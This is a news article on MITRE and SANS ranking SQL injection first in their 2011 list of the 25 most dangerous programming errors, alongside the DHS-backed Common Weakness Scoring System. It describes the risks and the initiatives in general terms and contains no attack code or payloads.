SQL Injection Deemed No. 1 Software Flaw
25 Most Dangerous Programming Errors ListedThat's according to a list of the 25 most dangerous programming errors issued Monday by MITRE, the not-for-profit contractor that manages an array of federal government technology and engineering programs, and the SANS Institute, an organization that provides IT security training.
The release of the list coincides with the issuance by MITRE and the Department of Homeland Security of the Common Weakness Scoring System and the Common Weakness Risk Analysis Framework, initiatives aimed at identifying vulnerabilities in software.
In application-security lingo, the SQL injection problem is officially known as CWE-89: Improper Neutralization of Special Elements used in an SQL Command (CWE stands for Common Weakness Enumeration).
Hackers used SQL injection to compromise organizations such as Sony Pictures, PBS, MySQL.com, security company HB Gray and many others just this year, the MITRE/SANS report says, adding:
"If attackers can influence the SQL (structured query language) that you use to communicate with your database, then suddenly all your fun and profit belongs to them. If you use SQL queries in security controls such as authentication, attackers could alter the logic of those queries to bypass security. They could modify the queries to steal, corrupt or otherwise change your underlying data. They'll even steal data one byte at a time if they have to, and they have the patience and know-how to do so."
The catalog of 25 most dangerous programming errors updates a list issued 2½ years ago (see Security Experts Unveil List of Common Vulnerabilities and How to Fix Them). Errors in the original list were not ranked. "This year's list is a collection of the worst software weaknesses that happen the most and are easiest to exploit," MITRE CWE Project Leader Bob Martin says.
The 2011 list employed three of the 18 factors in the Common Weakness Scoring System: How often does the weakness occur in software, how bad is it when that weakness occurs and how easy is it to exploit.
The Common Weakness Scoring System and the Common Weakness Risk Analysis Framework are aimed at helping vendors identify security flaws in the software they develop and aid their customers in vendor management by knowing what they're getting. "It provides the first incentive system to persuade programmers and software companies that security flaws must be fixed before they deliver the code to the users," says SANS Institute Research Director Alan Paller. "If every buyer asks for a report showing how well the developer did on the top 25, it will be a very short time before the programmers stop making those errors because sending a report saying they made the errors is the same as saying the programmers are incompetent."
Bruce McConnell, counselor to DHS's National Protection and Program Directorate, says the release of the top 25 list and the scoring system represents a milestone in collaboration among government and the private sector on software security. The concurrent releases, he says, "are extremely successful examples of the type of public-private collaboration the department has been advocating to improve the nation's cybersecurity."